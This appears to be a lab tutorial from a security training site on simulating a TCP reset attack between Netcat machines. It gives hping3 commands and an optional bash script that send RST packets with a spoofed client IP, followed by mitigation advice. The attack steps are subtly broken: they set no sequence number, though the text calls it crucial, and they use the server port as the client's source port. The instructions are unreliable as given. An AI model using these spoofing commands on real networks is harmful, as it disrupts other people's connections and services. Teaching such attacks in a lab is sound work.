Logo Light

Network

Web Apps

System

Cloud

Cryptography

IoT

Exercise 23: TCP Reset Attack Simulation

by | Jan 23, 2025

Objective

Simulate a TCP Reset (RST) Attack to understand how forged TCP reset packets can disrupt an active network connection and explore how sequence number prediction impacts the success of this attack.

Scenario

As a cybersecurity analyst, you need to assess the resilience of your network services against TCP Reset (RST) attacks. In this exercise, you’ll establish a TCP connection between two machines and simulate an attack by injecting forged TCP RST packets to disrupt the connection.

⚠️ Important: This exercise should only be performed in a legal and controlled lab environment. Unauthorized network disruption is illegal and unethical.

Lab Instructions

Step 1: Set Up the Lab Environment

  • Machine A (Server): Acts as the server using Netcat (nc).
  • Machine B (Client): Connects to the server using Netcat.
  • Machine C (Attacker): Launches the TCP reset attack using hping3.

Step 2: Install Required Tools

On all machines, install Netcat and hping3: 

sudo apt update 
sudo apt install netcat hping3 -y

Step 3: Establish a TCP Connection

On Machine A (Server):

nc -l -p 12345

This listens on port 12345.

On Machine B (Client):

nc <server-ip> 12345

Replace <server-ip> with the IP address of Machine A.

Test the connection:

Type a message on Machine B and confirm it appears on Machine A.

Step 4: Launch a TCP Reset Attack

On Machine C (Attacker):

Identify the TCP connection details using netstat on Machine A: 

sudo netstat -antp | grep 12345

Note the source and destination IPs and the connection’s port.

Craft and send a forged TCP RST packet: 

sudo hping3 -R -p 12345 -s 12345 -a <client-ip> <server-ip>

-R: Sends a TCP RST packet.

-p 12345: Target port on the server.

-s 12345: Source port.

-a <client-ip>: Spoofs the source IP to appear as the client.

<server-ip>: Target server’s IP.

Step 5: Verify the Connection Termination

  • Check the Netcat session between Machine A and Machine B.
  • If successful, the session will abruptly close due to the injected RST packet.
  • Attempt to send more data—if the connection is closed, the attack succeeded.

Solution & Explanation

How TCP Reset Attacks Work

  • TCP connections rely on a three-way handshake and a sequence of acknowledgment numbers.
  • A forged RST packet with the correct sequence number tricks the target into terminating the connection.

Sequence Number Prediction

  • Accurate sequence numbers are crucial for a successful TCP reset.
  • If the attacker correctly guesses or observes the sequence number, the injected RST packet will be accepted.
  • Encrypted connections (TLS/SSL) make this prediction much harder.

Impact of the Attack

  • Disruption of Services: Legitimate sessions (e.g., SSH, HTTP) can be forcibly terminated.
  • Denial of Service: Repeated RST injections can prevent connections from persisting.

Mitigation Strategies

1. Encrypt Network Traffic

  • Use TLS/SSL to encrypt sessions, preventing attackers from viewing TCP sequence numbers.

2. TCP RST Filtering

  • Configure firewalls to filter and block suspicious RST packets.

3. Increase Sequence Number Randomness

  • Modern systems randomize initial sequence numbers, making prediction difficult.

4. Intrusion Detection Systems (IDS)

  • Deploy IDS solutions to detect unusual TCP RST traffic.

5. Use VPNs

  • VPNs encapsulate traffic, hiding TCP headers from attackers.

Testing & Verification

  • Before Mitigation: Confirm the attack successfully terminates the TCP session.
  • After Mitigation: Implement firewalls or encryption and verify that the attack is blocked.

Check Firewall Logs:

sudo iptables -L -v | grep RST

Verify IDS Alerts:

  • Review IDS logs for flagged TCP RST injections.

Additional Script (Optional)

Automate TCP reset attack using a script:

#!/bin/bash
# TCP Reset Attack Script
if [ $# -ne 3 ]; then
  echo "Usage: $0 <target-ip> <target-port> <spoofed-ip>"
  exit 1
fi

target_ip=$1
target_port=$2
spoofed_ip=$3

sudo hping3 -R -p $target_port -a $spoofed_ip $target_ip

Run the script:

chmod +x tcp_reset_attack.sh
sudo ./tcp_reset_attack.sh <server-ip> 12345 <client-ip>

Conclusion

In this exercise, you simulated a TCP Reset Attack using hping3 to disrupt an active connection. You explored how predicting TCP sequence numbers is crucial for the success of this attack and discussed various mitigation strategies like encryption, firewall rules, and intrusion detection systems to protect against such disruptions.

0 Comments